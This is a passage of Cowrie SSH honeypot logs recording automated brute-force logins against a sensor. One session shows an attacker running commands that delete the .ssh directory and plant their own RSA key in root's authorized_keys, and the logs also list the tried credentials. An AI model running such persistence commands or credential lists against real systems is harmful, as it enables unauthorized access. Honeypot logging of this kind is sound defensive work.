"ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:41:37.662435Z","src_ip":"212.227.235.229","session":"d677ad1f24c4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:41:38.598422Z","src_ip":"212.227.235.229","session":"d677ad1f24c4"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:41:38.824152Z","src_ip":"212.227.235.229","session":"c08dcfd7744b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:41:38.825042Z","src_ip":"212.227.235.229","session":"d677ad1f24c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55576,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a2595fd19d0","protocol":"ssh","message":"New connection: 212.227.235.229:55576 (1.2.3.4:22) [session: 7a2595fd19d0]","sensor":"my-vps","timestamp":"2025-08-28T15:42:19.378322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:42:19.379385Z","src_ip":"212.227.235.229","session":"7a2595fd19d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:42:19.620978Z","src_ip":"212.227.235.229","session":"7a2595fd19d0"}
{"eventid":"cowrie.login.failed","username":"pamela","password":"pamela","message":"login attempt [pamela/pamela] failed","sensor":"my-vps","timestamp":"2025-08-28T15:42:20.628462Z","src_ip":"212.227.235.229","session":"7a2595fd19d0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:42:21.871662Z","src_ip":"212.227.235.229","session":"7a2595fd19d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50055,"dst_ip":"1.2.3.4","dst_port":22,"session":"147c99ff0012","protocol":"ssh","message":"New connection: 212.227.235.229:50055 (1.2.3.4:22) [session: 147c99ff0012]","sensor":"my-vps","timestamp":"2025-08-28T15:42:43.027508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:42:43.028539Z","src_ip":"212.227.235.229","session":"147c99ff0012"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:42:43.135611Z","src_ip":"212.227.235.229","session":"147c99ff0012"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29121993","message":"login attempt [admin/29121993] failed","sensor":"my-vps","timestamp":"2025-08-28T15:42:43.648258Z","src_ip":"212.227.235.229","session":"147c99ff0012"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47736,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b8ff9cbdc07","protocol":"ssh","message":"New connection: 212.227.235.229:47736 (1.2.3.4:22) [session: 4b8ff9cbdc07]","sensor":"my-vps","timestamp":"2025-08-28T15:42:44.489330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:42:44.490359Z","src_ip":"212.227.235.229","session":"4b8ff9cbdc07"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T15:42:44.594748Z","src_ip":"212.227.235.229","session":"4b8ff9cbdc07"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29111980","message":"login attempt [admin/29111980] failed","sensor":"my-vps","timestamp":"2025-08-28T15:42:44.757396Z","src_ip":"212.227.235.229","session":"147c99ff0012"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123","message":"login attempt [sol/123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:42:44.909702Z","src_ip":"212.227.235.229","session":"4b8ff9cbdc07"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29101993","message":"login attempt [admin/29101993] failed","sensor":"my-vps","timestamp":"2025-08-28T15:42:45.867123Z","src_ip":"212.227.235.229","session":"147c99ff0012"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:42:46.015707Z","src_ip":"212.227.235.229","session":"4b8ff9cbdc07"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29061992","message":"login attempt [admin/29061992] failed","sensor":"my-vps","timestamp":"2025-08-28T15:42:46.976751Z","src_ip":"212.227.235.229","session":"147c99ff0012"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29051982","message":"login attempt [admin/29051982] failed","sensor":"my-vps","timestamp":"2025-08-28T15:42:48.086257Z","src_ip":"212.227.235.229","session":"147c99ff0012"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56166,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3c725351e1b","protocol":"ssh","message":"New connection: 212.227.235.229:56166 (1.2.3.4:22) [session: e3c725351e1b]","sensor":"my-vps","timestamp":"2025-08-28T15:42:48.309072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:42:48.310025Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:42:48.624324Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:42:49.195143Z","src_ip":"212.227.235.229","session":"147c99ff0012"}
{"eventid":"cowrie.login.success","username":"root","password":"Ht123456.","message":"login attempt [root/Ht123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:42:49.931015Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:42:50.583597Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:42:50.584281Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:42:50.585287Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:42:50.942903Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33050,"dst_ip":"1.2.3.4","dst_port":22,"session":"44a3ad5ef037","protocol":"ssh","message":"New connection: 212.227.235.229:33050 (1.2.3.4:22) [session: 44a3ad5ef037]","sensor":"my-vps","timestamp":"2025-08-28T15:42:50.972623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:42:50.973451Z","src_ip":"212.227.235.229","session":"44a3ad5ef037"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:42:51.179145Z","src_ip":"212.227.235.229","session":"44a3ad5ef037"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:42:51.630407Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:42:51.631294Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:42:51.948436Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:42:51.949304Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.login.failed","username":"report","password":"report","message":"login attempt [report/report] failed","sensor":"my-vps","timestamp":"2025-08-28T15:42:52.045276Z","src_ip":"212.227.235.229","session":"44a3ad5ef037"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47244,"dst_ip":"1.2.3.4","dst_port":22,"session":"b83a904504e4","protocol":"ssh","message":"New connection: 212.227.235.229:47244 (1.2.3.4:22) [session: b83a904504e4]","sensor":"my-vps","timestamp":"2025-08-28T15:42:52.267544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:42:52.268219Z","src_ip":"212.227.235.229","session":"b83a904504e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:42:52.584454Z","src_ip":"212.227.235.229","session":"b83a904504e4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:42:53.252491Z","src_ip":"212.227.235.229","session":"44a3ad5ef037"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:42:53.889940Z","src_ip":"212.227.235.229","session":"b83a904504e4"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:42:55.208506Z","src_ip":"212.227.235.229","session":"b83a904504e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47246,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9e6a38c43e0","protocol":"ssh","message":"New connection: 212.227.235.229:47246 (1.2.3.4:22) [session: b9e6a38c43e0]","sensor":"my-vps","timestamp":"2025-08-28T15:42:55.524424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:42:55.525299Z","src_ip":"212.227.235.229","session":"b9e6a38c43e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:42:55.843132Z","src_ip":"212.227.235.229","session":"b9e6a38c43e0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:42:57.151700Z","src_ip":"212.227.235.229","session":"b9e6a38c43e0"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:42:57.469611Z","src_ip":"212.227.235.229","session":"e3c725351e1b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:42:57.471106Z","src_ip":"212.227.235.229","session":"b9e6a38c43e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52582,"dst_ip":"1.2.3.4","dst_port":22,"session":"59f891930a0f","protocol":"ssh","message":"New connection: 212.227.235.229:52582 (1.2.3.4:22) [session: 59f891930a0f]","sensor":"my-vps","timestamp":"2025-08-28T15:43:40.645995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:43:40.647552Z","src_ip":"212.227.235.229","session":"59f891930a0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:43:40.878402Z","src_ip":"212.227.235.229","session":"59f891930a0f"}
{"eventid":"cowrie.login.failed","username":"rover","password":"rover","message":"login attempt [rover/rover] failed","sensor":"my-vps","timestamp":"2025-08-28T15:43:41.839056Z","src_ip":"212.227.235.229","session":"59f891930a0f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:43:43.072354Z","src_ip":"212.227.235.229","session":"59f891930a0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24529,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0b80aa8999d","protocol":"ssh","message":"New connection: 212.227.235.229:24529 (1.2.3.4:22) [session: f0b80aa8999d]","sensor":"my-vps","timestamp":"2025-08-28T15:43:56.966467Z"}
